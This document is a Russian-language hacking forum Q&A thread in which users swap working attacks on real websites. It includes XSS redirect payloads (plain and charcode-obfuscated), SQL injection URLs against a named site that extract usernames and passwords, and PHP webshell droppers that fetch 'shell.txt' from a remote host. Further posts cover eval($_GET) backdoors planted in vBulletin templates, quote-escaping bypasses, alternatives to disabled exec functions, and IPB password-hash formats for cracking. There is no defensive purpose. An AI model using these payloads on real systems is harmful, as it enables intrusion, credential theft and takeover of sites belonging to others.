Возможноли через конструкцию выполнения скрипта javascript:.... (например javascript=alert()) сделать код для редиректа ? Например с использованием eval - javascript:eval("злой_код")
И как это можно сделать. А если низя, то почему ?

<img src=. onerror=eval("document.location.href='http://google.com/';")>
<img src=. onerror=eval(String.fromCharCode(100,111,99,117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))>
Думаю понятно.

например javascript=alert()
вместо "=" должно быть ":", хотя подозреваю, что просто опечатка)

<img src=. onerror=eval("document.location.href='http://google.com/';")>
<img src=. onerror=eval(String.fromCharCode(100,111,99,117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))>
Думаю понятно.


вместо "=" должно быть ":", хотя подозреваю, что просто опечатка)

Понятно, но я не это имел ввиду. Нужно чтото вроде
<img src="javascript:ЗЛОЙ_КОД_ДЛЯ_РЕДИРЕКТ А">
спросите почему так - потомучто что я не слова неговорил про img вообще, а если тег не img и нету в теге параметров типа onerror... А есть проста возможность вставить куданибуть конструкцию javascript:...

вот в чем вся соль (с) ...

src=javscript:eval("document.location.href='http://google.com/';")
src=javscript:eval(String.fromCharCode(100,111,99, 117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))
Не вижу никакой разницы.

Не могу понять, в http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
все норм показывает, видимые поля есть, все дела.
Как только ввожу http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12 ,13,14+from+information_schema.tables-- показывает ошибку, что за беда подскажите плз.

Gemini12, коментарий "--" требует пробел в конце.
Во вторых версия мускула 4я, в ней нет information_schema.

2BlackSun
Не мог бы скинуть ссылочку на список таблиц 4 мускули если не затруднит. Очень надо плз.

2 Gemini12:

такого списка нет. Есть словари для брута - таблиц и колонок. Имеются в комплекте у SIPT4. У всех разные. У кого больше, у кого меньше

Есть уязвимость на одном популярном(!) сервисе (форуме). На оооочень популярном. Каждый античатовец знает его, или был там хотя бы раз. Уязвимость заключается в том, что на форум можно заливать файл на любой(!) пост. Пример: мой ник mailbrush. Ник юзера, скажем hackadmin. hackadmin написал пост бла бла бла, онтоле похекал майкрософт. Я могу к этому посту прилепить свой файл. Стоит ли эта уязвимость отдельной темы в разделе "УЯЗВИМОСТИ" или пока держать это в привате?

Стоит ли эта уязвимость отдельной темы в разделе "УЯЗВИМОСТИ" или пока держать это в привате?

Чего полезного из этого можно извлечь ?

2BlackSun
Не мог бы скинуть ссылочку на список таблиц 4 мускули если не затруднит. Очень надо плз.

http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,concat_ws(0x2F,username,use rpass),6,7,8,9,10,11,12,13,14+from+users--+

Иммется выполнение кода типа file?c=phpinfo();
пождскажите как через это залить шелл?

Иммется выполнение кода типа file?c=phpinfo();
пождскажите как через это залить шелл?
wget

wget
а если его нету в системе? + вырублена функция system(),exex(),passtru()

а если его нету в системе? + вырублена функция system(),exex(),passtru()
include()

ps
9000 пост ;)

include()

ps
9000 пост ;)

там блин такая булка, что авы выводяться вот типа так

http://ыыыы/image.php?u=124124&dateline=124124124

+ я думую что они проверяются там на пхп код.

И удалённый инклуд запрещён.а юзать логи както извратно в данном случае..

ЗЫ есть досутуп в админку, но както не получеться там uploder сделать =(

там блин такая булка, что авы выводяться вот типа так

http://ыыыы/image.php?u=124124&dateline=124124124

+ я думую что они проверяются там на пхп код.

И удалённый инклуд запрещён.а юзать логи както извратно в данном случае..

ЗЫ есть досутуп в админку, но както не получеться там uploder сделать =(
Ну удалённый то понятно.
А вот как ты хотел то?
Инклюд логами делай.

зделать какуюнибудь качалку на пхп, аля :

<? $data = implode('',file('http://127.0.0.1/shell.txt')); $fp=fopen('./123.php','wb'); fputs($fp,$data); fclose($fp); ?>

Лей шелл вот так:
<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
либо, если экранируются кавычки:
<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>

а если его нету в системе? + вырублена функция system(),exex(),passtru()
shell_exec, popen, pcntl_exec.

Кроме wget есть еще links, lynx, curl, GET, fetch

Лей шелл вот так:
<?php copy("http://hacker.host/shell.txt", "./shell.php"); ?>
либо, если экранируются кавычки:
<?php copy(stripslashes("http://hacker.host/shell.txt", "./shell.php")); ?>

Спасибо, люди!
Отдельное спасибо InFlame, за stripslashes(), я просто не как не мог допереть как обойти ковычки.

Чего полезного из этого можно извлечь ?
Сам хз :)

Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке ID=1322879' выводит

Чего полезного из этого можно извлечь ?
Сам хз :)

Кстати, можно ли из ошибки конвертирования сделать инъекцию? При подстановке ID=1322879' выводит

Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.FormatException: Input string was not in a correct format.

Source Error:

Line 139: forumid = CLng(SafeHTML(Request.QueryString("forumid")))
Line 140: If mode = "edit" Then
Line 141: forumid = GetSingleValueViaRS("SELECT forumid from pgd_messages with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text, 0)
Line 142: arrTheArray = GetArrayViaRS("SELECT upfile,upfilesize from pgd_upfile with (nolock) WHERE messageID=" & CLng(SafeHTML(Request.QueryString("messageID"))), CommandType.Text)
Line 143: If IsArray(arrTheArray) Then


Source File: не скажу :) Line: 141

Stack Trace:

[FormatException: Input string was not in a correct format.]
Microsoft.VisualBasic.CompilerServices.Conversions .ParseDecimal(String Value, NumberFormatInfo NumberFormat) +718618
Microsoft.VisualBasic.CompilerServices.Conversions .ToLong(String Value) +178

[InvalidCastException: Conversion from string "1322879'" to type 'Long' is not valid.]
Microsoft.VisualBasic.CompilerServices.Conversions .ToLong(String Value) +714736
ASP.upload_aspx.__Render__control1(HtmlTextWriter __w, Control parameterContainer) in не скажу :):141
System.Web.UI.Control.RenderChildrenInternal(HtmlT extWriter writer, ICollection children) +115
System.Web.UI.Page.Render(HtmlTextWriter writer) +38
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +4240


Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082

вопрос такой, есть шелл (апач),так же есть файлы с правами 777 которые я могу шеллом редактить,у этих файлов владелец (вебмастер),можно за счет этого повысить права у шелла до вебмастера?вопрос навено глуповат, тут где то писалось об этом, и однозначного ответа там не прозвучало.
спасибо

milw0rm.com в помощь :)

Плиз, дайте чёткие указание как залить шелл в vbulitin 3.5.1, я писал код в модулях,
местоположение faq_comlete, код например copy("http://ааа/file.txt","./shell.php"); при заходе на faq.php? выскакивали "ошибки содержимого", шелл не залился. Но когда вписал eval($_GET[e]); то заработало faq?e=phpinfo();

Дайте пожалуйста чёткие указания, какой код вписать в faq.?e=

e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4d CIsIi4vc2hlbGwucGhwIik7');

e=base64_decode('Y29weSgiaHR0cDovL+Dg4C9maWxlLnR4d CIsIi4vc2hlbGwucGhwIik7');
там магические кавычки в ON

там магические кавычки в ON
eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));

eval($_GET[e]);
заменить на
eval(stripslashes($_GET[e]));


Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)

Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?

milw0rm.com в помощь :)
вопрос был про повышение прав до пользователя,а не до рута,используя сплоиты с milw0rm.com.
или я не то понял :confused:

А root не пользователь? И поимев рута у тебя есть большая вероятность поиметь обычного пользователя.

ЗЫ: и експлоиты не обязательно повышают права до рута...

Как можно залить в IPB шелл и где в БД храняться хэши паролей?

PS есть доступ на чтение БД
Версия форума 2.3.6

Как можно залить в IPB шелл и где в БД храняться хэши паролей?

PS есть доступ на чтение БД
Версия форума 2.3.6
1) IPB 2.x.x - md5(md5($salt).md5($pass)), префикс - whb_, таблица - members_converge, salt - 5 символов

2) https://forum.antichat.ru/threadedpost1095553.html

Секн,А такой вопрос? Кавычки при MgQ=ON, убираютья прямо в коде, или в браузере(т.е. при приёме GET запроса)

Тоесть да же когда пишешь сценарии, то например я пишу скрипт такой print("Hello World"); то, он не заработает? чтоли? изза ковычек?
Директива magic_quotes_gpc действует ТОЛЬКО на значения Get, Post и Cookie.

Что можно сделать с таким?

http://bestquest.info/test.php

upd: аа... Ясно... Это просто корень сайта в корне сервера лежит :)

всем привет,есть такая проблема.Есть запрос
-1+union+select+1,2,concat(username,0x3a,password,) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*
username отображается нормально а password - ©5ÇoêÉ-:
Пробывал aes_decrypt(aes_encrypt(password,1),1) ничего не вышло.Есть предположения ?:)

В чем проблема то?
Ты вывел данные из базы...

всем привет,есть такая проблема.Есть запрос
-1+union+select+1,2,concat(username,0x3a,password,) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*
username отображается нормально а password - ©5ÇoêÉ-:
Пробывал aes_decrypt(aes_encrypt(password,1),1) ничего не вышло.Есть предположения ?:)
cast(password+as+binary) or convert(password+using+latin1) or convert(password using cp1251)

cast(password+as+binary) or convert(password+using+latin1)
ни то ни другое не помогло =(

mailbrush, проблема в то что пароль вывоидтся криво ©5ÇoêÉ-: